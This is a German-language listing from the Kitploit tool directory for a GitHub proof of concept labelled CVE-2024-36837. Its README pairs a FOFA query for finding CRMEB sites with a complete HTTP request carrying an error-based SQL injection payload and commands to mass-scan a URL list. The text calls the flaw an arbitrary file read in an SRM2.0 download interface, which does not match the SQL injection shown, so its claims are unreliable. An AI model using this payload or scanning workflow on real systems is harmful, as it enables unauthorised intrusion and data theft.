Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36837 — CVE-2024-36837 POC | Kitploit
Tools/GitHubGitHub/lhc321-source/cve-2024-36837
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHublhc321-source/cve-2024-36837

CVE-2024-36837

CVE-2024-36837 POC

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

README.md

#CVE-2024-36837

Haftungsausschluss

#智联云采 SRM2.0 runtimeLog/download Schnittstelle weist eine Schwachstelle für beliebiges Dateilesen auf. Nicht authentifizierte Angreifer können über diese Schwachstelle wichtige Systemdateien (z. B. Datenbankkonfigurationsdateien, Systemkonfigurationsdateien) lesen, was die Website in einen äußerst unsicheren Zustand versetzt.

fofa-Syntax: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #Fügen Sie vor der URL http:// oder https:// hinzu python 11.py

#Verwendung python cve.py -h

#Massenüberprüfung Die URL-Adresse in url.txt muss mit http:// oder https:// beginnen. python cve.py -f url.txt

#Einzelscan Die URL-Adresse muss mit http:// oder https:// beginnen. python cve.py -u url

Tool herunterladen